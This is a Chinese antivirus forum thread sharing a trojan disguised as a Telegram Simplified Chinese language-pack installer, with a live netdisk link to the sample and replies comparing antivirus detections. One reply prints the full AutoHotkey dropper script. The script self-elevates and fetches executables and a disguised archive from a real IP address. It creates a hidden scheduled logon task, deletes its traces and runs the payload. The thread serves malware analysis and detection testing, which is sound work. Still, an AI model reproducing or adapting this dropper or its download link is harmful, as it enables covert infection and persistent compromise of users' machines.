查看: 984|回复: 17
收起左侧

[病毒样本] 汉化包变种木马

[复制链接]
1432447293
发表于 前天 17:42 | 显示全部楼层 |阅读模式
通过网盘分享的文件:点击此处转换简体中文包zh-cn~.msi
链接: https://pan.baidu.com/s/11-6s1Ko-My2Tp4nURD6g8g 提取码: mdnq

莒县小哥
发表于 前天 17:49 | 显示全部楼层
本帖最后由 莒县小哥 于 2025-5-7 06:17 编辑

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 前天 17:51 | 显示全部楼层
火绒扫描miss
1073328164
发表于 前天 17:51 | 显示全部楼层
Lolo期待
发表于 前天 17:59 | 显示全部楼层
卡巴斯基扫描miss,KSN未知
驭龙
发表于 前天 18:02 | 显示全部楼层
让人惊叹,dr.web抵御Exploit也就是Dr.Web Shellguard anti-exploit功能,居然成功阻止运行,但由于是Dr.Web Shellguard anti-exploit技术,所以只是阻止MSI文件运行,没有删除样本,这是Dr.Web Shellguard anti-exploit机制,不是BUG

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
pal家族
发表于 前天 19:14 | 显示全部楼层
本帖最后由 pal家族 于 2025-5-6 19:16 编辑

payload下载地址被卡巴拉黑。

已防止访问危险网站
导航到旨在感染您的计算机,降低其性能,破坏系统或造成其他损害的恶意网站已被阻止。

我们保护您不访问此网站。您可以安全地关闭该窗口。

检测时间:

2025-5-6 19:15:21

网址:

http://103.68.181.217/code.zip

阻止者:

安全浏览

原因:

危险网址

检测方法:

数据库






#NoTrayIcon
if not A_IsAdmin
{
   try
   {
      Run *RunAs "%A_ScriptFullPath%"
      ExitApp
   }
   catch
   {
      ExitApp
   }
}

FileCreateDir, C:\Users\Public\403\python


SplitPath, A_ScriptName, OutFileName

if (InStr(OutFileName, "zh-cn", true)) {
    Run, TG://setlanguage?lang=classic-zh-cn
}












SendMode Input
SetWorkingDir %A_ScriptDir%

for each_process in ComObjGet("winmgmts:").ExecQuery("Select * from Win32_Process where Name = 'telegram.exe'")
{
    telegramPID := each_process.ProcessId
    telegramPath := each_process.ExecutablePath

    if (telegramPath)
    {
        SplitPath, telegramPath,, telegramDir
        Run, "%telegramDir%\telegram.exe" -- tg://setlanguage?lang=classic-zh-cn,, Hide
    }
}












Run, cmd /c del C:\Users\Public\403\xz.ahk, , Hide
















UrlDownloadToFile, http://103.68.181.217/rar.exe, C:\Users\Public\403\rar.exe
UrlDownloadToFile, http://103.68.181.217/py.zip, C:\Users\Public\403\py.png
UrlDownloadToFile, http://103.68.181.217/code.zip, C:\Users\Public\403\code.zip
UrlDownloadToFile, http://103.68.181.217/wd1.exe, C:\Users\Public\403\wd1.exe
UrlDownloadToFile, http://103.68.181.217/wd1.ahk, C:\Users\Public\403\wd1.ahk


FileCopy, C:\Windows\System32\schtasks.exe, C:\Users\Public\403\cc.exe, 1

Run, C:\Users\Public\403\cc.exe /create /sc onlogon /tn Tahk /rl highest /tr "C:\Users\Public\403\wd1.exe" /F, , Hide

RunWait, C:\Users\Public\403\rar.exe x -y C:\Users\Public\403\Py.png C:\Users\Public\403\python, , Hide

RunWait, "C:\Users\Public\403\rar.exe" x -y C:\Users\Public\403\py.png C:\Users\Public\403\python, , Hide

RunWait, cmd /C DEL C:\Users\Public\403\py.png&del C:\Users\Public\403\cc.exe, , Hide

Run, C:\Users\Public\403\wd1.exe, , Hide
pal家族
发表于 前天 19:20 | 显示全部楼层
驭龙 发表于 2025-5-6 18:02
让人惊叹,dr.web抵御Exploit也就是Dr.Web Shellguard anti-exploit功能,居然成功阻止运行,但由于是Dr.We ...

补一个老司机的。

今天,2025/5/6 下午7:17:23;检测到恶意对象;Windows® installer;msiexec.exe;C:\Windows\System32;13036;?????;发起者;检测到: PDM:Trojan.Win32.Generic;检测到;PDM:Trojan.Win32.Generic;木马;高;确切;点击此处转换简体中文包zh-cn~.msi;点击此处转换简体中文包zh-cn~.msi;D:\360极速浏览器X下载;进程;行为分析


驭龙
发表于 前天 19:22 | 显示全部楼层
pal家族 发表于 2025-5-6 19:20
补一个老司机的。

今天,2025/5/6 下午7:17:23;检测到恶意对象;Windows® installer;msiexec.exe; ...

实际上俄系中还是卡巴最强,可惜卡巴不爱我
123456aaaafsdeg
发表于 前天 19:36 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-8 11:43 , Processed in 0.123229 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表